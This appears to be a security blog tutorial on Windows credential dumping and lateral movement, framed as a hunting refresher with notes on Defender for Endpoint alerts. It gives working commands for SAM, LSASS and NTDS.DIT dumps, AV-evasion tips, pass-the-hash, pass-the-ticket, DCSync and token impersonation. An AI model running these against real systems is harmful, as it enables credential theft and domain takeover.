Credential Access and lateral movement: What can attackers do with the stolen credentials?

Today I would like to cover two well-known tactics, which will be Credential Access and Lateral Movement. Both of these tactics consist of relevant techniques that attackers have been using in the wild. Examples are Credential Dumping and Pass the Hash.

Despite that these techniques are relative old. It is still very important these days. Having a good understanding on how an attacker can dump credentials and what they can do with it, makes it easier to hunt for it. I’ve decided to write this blog post as a refresher for myself, because we still see a lot of these attacks nowadays, and it won’t go away anytime soon.

During this blog post, we will focus on different examples. We will cover how to dump credentials from memory and show, what attackers can do with the stolen credentials.

As we can see in the image down below, there are multiple threat groups that have been using Credential Dumping attacks. Since there are tons of public tools available, it became relative easy to execute this attack.

Where are credentials stored?

Credentials are stored in the Local Security Authority Subsystem Services (LSASS) on behalf of users with an active session. The credentials needs to be stored in memory, so it can provide the Single Sign-On (SSO) experience. This allows users to access network resources, such as file shares, without re-entering a password all the time.

There are two types of logons in Windows. The first one is a local logon. During this process, the credentials of local accounts are validated against the Security Account Manager (SAM) database. The second one is the domain user logon, which validates the domain credentials against the Active Directory (AD) database.

Security Account Manager (SAM)

Windows stores the credentials of local accounts in the Security Account Manager (SAM) database. Once a user has attempted to login with a local account. The credentials needs to be validated against the SAM database, and if the password matches. The user would then be able to successfully login.

An attacker can dump the credentials from the SAM database to retrieve the credentials of the local accounts on a machine. In order to do this, we first need to extract the SAM & SYSTEM hives. Using esentutl.exe will evade Windows Defender AV from blocking it. This has been tested during the write-up of this blog post, but it may change in the future.

  • SAM Hive
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & C:\Windows\System32\cmd.exe /c esentutl.exe /y /vss C:\Windows\System32\config\SAM /d c:\temp\sam
  • SYSTEM Hive
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & C:\Windows\System32\cmd.exe /c esentutl.exe /y /vss C:\Windows\System32\config\SYSTEM /d c:\temp\system

We can see that we have successfully extracted the SAM & SYSTEM hives.

This allows us to view the credentials that are associated with each individual local account on a machine. We will be using Mimikatz for this example.

privilege::debug
token::elevate
lsadump::sam /system:C:\Temp\SYSTEM /sam:C:\Temp\SAM

Result

At this example, we can see for example the NT hash of the RID-500 account.

EDR

While Windows Defender AV did not caught our local SAM dump. Defender for Endpoint did trigger an alert.

Local Security Authority Subsystem Services (LSASS)

The Local Security Authority Subsystem Service (LSASS) stores credentials in memory on behalf of users with active Windows sessions. LSASS can store the following credentials in memory:

  • Reversible encrypted plaintext
  • Kerberos tickets (TGT, ST)
  • NT hash
  • LM hash

An attacker can dump the LSASS process memory to obtain the NT hashes of users with an active session on a machine. During this example, we will be using the rdrleakdiag.exe process in Windows to dump the LSASS process memory. At the moment of writing this blog post. Windows Defender AV has not blocked rdrleakdiag.exe from dumping reading the LSASS process memory.

Command

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & C:\Windows\System32\cmd.exe /c rdrleakdiag.exe /p 752 /o C:\Temp /fullmemdmp /wait 1

At the sample result, we have executed the above command.

We can now use Mimikatz to read the .dmp file.

privilege::debug
sekurlsa::minidump C:\Temp\minidump_752.dmp
sekurlsa::logonPasswords full

Result

At the sample result, we can now read the credentials from the minidump file.

EDR

During this write-up, we had Defender for Endpoint installed on the test machines. MDE will trigger an alert, when an LSASS dump file has been written to disk, after making an API call to MiniDumpWriteDump.

Dumping LSASS and evading EDR?

As discussed previously, Defender for Endpoint will trigger an alert once an LSASS dump file has been written to disk after making an API call to MiniDumpWriteDump.

  • EDR Bypass (1)

An security researcher has explained in a blog post, how this could have been bypassed by dumping the LSASS process memory by accessing the LSASS process handle via the PssCaptureSnapshot API. In order to evade Defender for Endpoint.

We can now use Mimikatz’s sekurlsa::minidump command to read the .dmp file.

Result

At the sample result, we can see that MDE has now only alert on the hacker tool itself. There is no alert, such as ‘Sensitive credential memory read’ or something similar. If we would customize the tool a bit, MDE wouldn’t had flag these two alerts.

  • EDR Bypass (2)

An security researcher has wrote a blog post where he explains how to create a memory dump of the LSASS process after unhooking relevant API functions. This can help in bypassing EDR products.

We can now use Mimikatz again to read the LSASS dump file. As an example, we are now accessing the LSASS process memory to view all the Kerberos tickets.

Result

Creating a memory dump of the LSASS process after unhooking relevant API function didn’t trigger any alert in Defender for Endpoint.

Pass the Hash – (Domain Credentials)

After dumping credentials from memory. An attacker can use the NT hash of an user to perform a Pass the Hash attack. PtH is a technique where an attacker captures an NT hash, so it can then pass it through for authentication. This allows an attacker to move laterally to other systems.

  • Mimikatz

Command

sekurlsa::pth /user:Jones /domain:contso.com /ntlm:74f6e03839a3147a74bb9d66dfb5d555

Result

At the sample result, we were using the NT hash of Jones to perform a PtH attack on behalf of the targeted user, so we could access the C$ dollar share on a Domain Controller.

  • SharpKatz

There is a similar tool that has implemented the ”sekurlsa” module of Mimikatz to perform attacks like PtH and PtT. An attacker can use SharpKatz as well to perform a Pass the Hash attack.

Command

SharpKatz.exe --Command pth --User Jones --Domain contoso.com --NtlmHash 74f6e03839a3147a74bb9d66dfb5d555

Result

At the sample result, we were using SharpKatz to execute a PtH attack.

Pass the Hash (RID-500)

Once an attacker has dumped the credentials from the local SAM database. It is able to obtain the NT hash for the RID-500 account. This is built-in local Administrator on a Windows machine.

If the password of the RID-500 is the same on every machine in the network. An attacker only needs to compromise one individual machine to compromise the entire environment.

Here we are using Pass the Hash with the RID-500 account.

sekurlsa::pth /user:Administrator /domain:. /ntlm:7ee68699a16f305b993019ce5f86f05d

Result

At the sample result, we can see that we now can access a server as the RID-500 account.

OverPass the Hash

OverPass the Hash is a direct write operation of a forged TGT or TGS directly into LSASS process memory for the currently logged-in user, bypassing authenticating or interacting directly with the Domain Controller. The process behind this attack is to use the hash of a (targeted) user to obtain directly a Kerberos TGT, which then can be used to access resources on behalf of a user.

During this example, we will be using Rubeus to do so.

Command

Rubeus.exe asktgt /user:Jones /domain:contoso.com /aes256:276b6cb7eaa082778eaa80b10804bd3fd309fc10eac76f8bc16bcf1ecc68d8aa /ptt

Result

At the sample result, we can see that the ‘asktgt’ command of Rubeus has requested a Kerberos TGT from a hash that we just specified.

We can now access the C$ dollar share on a Domain Controller on behalf of the user Jones.

Pass the Ticket

Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account’s password. Kerberos authentication can be used as the first step to lateral movement to a remote system.

  • Mimikatz

We will be using Mimikatz as one of the examples. First, we have to export all the Kerberos tickets from memory.

Command

privilege::debug
sekurlsa::tickets /export

The second step is to insert the Kerberos TGT of the targeted user.

Command

kerberos::ptt [0;1f9590eb]-2-0-40e10000-Jones@krbtgt-CONTOSO.COM.kirbi
misc::cmd

Result

At the sample result, we have authenticated as the user Jones with his Kerberos TGT to access the C$ dollar share on a Domain Controller.

EDR

Defender for Endpoint will flag when .KIRBI files have been exported from memory.

  • Rubeus

The first step is to obtain a user’s TGT. Rubeus has a feature that allows to monitor incoming authentications to a system. Once a user has logged on to the machine or has a current session, it will extract the TGT.

Command

Rubeus.exe monitor /interval:30

We can see a TGT of the user Jones, because this user still has a current session with the targeted machine.

The second step is use the TGT of Jones to execute an Pass the Ticket attack.

Command

Rubeus.exe ptt /ticket:[Base64 string]

Result

At the sample result, we can see that we have imported the Kerberos TGT of the user Jones.

This allows us to be able to access the C$ share on a Domain Controller.

WDigest Downgrade

Digest protocol is used for clients to send cleartext credentials to Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) applications. This protocol is only enabled on legacy systems like Windows 7 and Windows Server 2008, but an attacker can make a registry flip to enable the Digest protocol on modern systems. In order to retrieve the plain-text password of a user.

An attacker can enable the Digest protocol by running the following command:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

Result

We can now use the ‘sekurlsa::wdigest’ command in Mimikatz to read the plain-text password on a machine.

NTDS.DIT

NTDS.DIT is a file on a Domain Controller that stores Active Directory data, which includes information about user objects and the password hashes.

An attacker that has Domain Admin or equivalent could extract the NTDS.DIT file to obtain all the password hashes for each individual account.

First, we need to use WMIC to execute VSSAdmin in order to create a new volume shadow copy.

Command

wmic /node:'DC' /user:'CONTOSO\Jones' /password:'Passw0rd!' process call create "cmd /c vssadmin create shadow /for=C: 2>&1"

Result

The second step is to extract the NTDS.DIT file from the new volume shadow copy.

wmic /node:'DC' /user:'CONTOSO\Jones' /password:'Passw0rd!' process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\windows\temp\ntds.dit 2>&1"

Result

The third step is to save the SYSTEM hive from the registry.

wmic /node:'DC' /user:'CONTOSO\Jones' /password:'Passw0rd!' process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\windows\temp\SYSTEM.hive 2>&1"

Result

The fourth is to retrieve the NTDS.DIT & SYSTEM hive and make a copy of the files to the C:\Temp folder on the machine we control.

copy \\DC\c$\windows\temp\ntds.dit C:\temp
copy \\DC\c$\windows\temp\system.hive C:\temp

Result

The final step is to extract all the NT hashes from the NTDS.DIT file. During this example, we will be using NTDSDumpEx to do so.

NTDSDumpEx.exe -d C:\temp\ntds.dit -s C:\temp\SYSTEM.hive

Result

At the sample result, we can see all the NT hashes that belong to the accounts. An attacker can then use the hashes to execute a PtH attack. Once it has network access again.

DCSync

DCSync is a late-stage kill chain attack that allows an attacker to simulate the behavior of Domain Controller (DC) in order to retrieve password data via domain replication.

An attacker that has DA or equivalent rights would be able to retrieve all the password hashes of any user within the domain via replication.

  • Mimikatz

We will be using Mimikatz to do this.

Command

lsadump::dcsync /user:CONTOSO\krbtgt

Result

At the sample result, we have now the NT hash of the KRBTGT account. This allows us to create Golden Tickets and persist in the environment.

  • SharpKatz

SharpKatz has the lsadump::dcsync feature of Mimikatz as well, so as an example. We will execute a DCSync with SharpKatz.

Command

SharpKatz.exe --Command dcsync --User CONTOSO\krbtgt --Domain contoso.com --DomainController DC

Result

At the sample result, we can see the exact same NT hash as the previous test with Mimikatz.

Abusing Windows Access Tokens

Once a user has logged in, Windows will create an access token for the specific user. It is used to store a user’s identity and privileges. The access token that is created when a user has logged in, is the primary access token. This is created by the Local Security Authority. During this example, we will be using Mimikatz to demonstrate it.

Let’s say that a privileged user has a current session on the compromised machine that we own, and we had luck. Because this ACE had DS-Replicate-Get-Changes and DS-Replicate-Get-Changes-All permission.

First, we are trying to execute DCSync user as the user ”Scrub” – as we can see here, we don’t have the permission to do so.

We can list all the tokens on a system.

Command

privilege::debug
token::list

Result

At the sample result, we can see the primary access token for an ACE, which is ”Izzy”.

We can now use this access token to impersonate the user “Izzy”, which is the ACE with DCSync privileges.

Command

token::elevate /id:554542

Result

At the sample result, we have impersonated the user “Izzy” now.

Since the user “Izzy” has DCSync privileges. We can now execute DCSync as the impersonated user!

Summary

We have covered different ways to dump credentials and explained the different variations of it. Attackers can use different sort of credentials to move laterally, whether it’s the NT hashes or Kerberos TGTs.

Reference

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s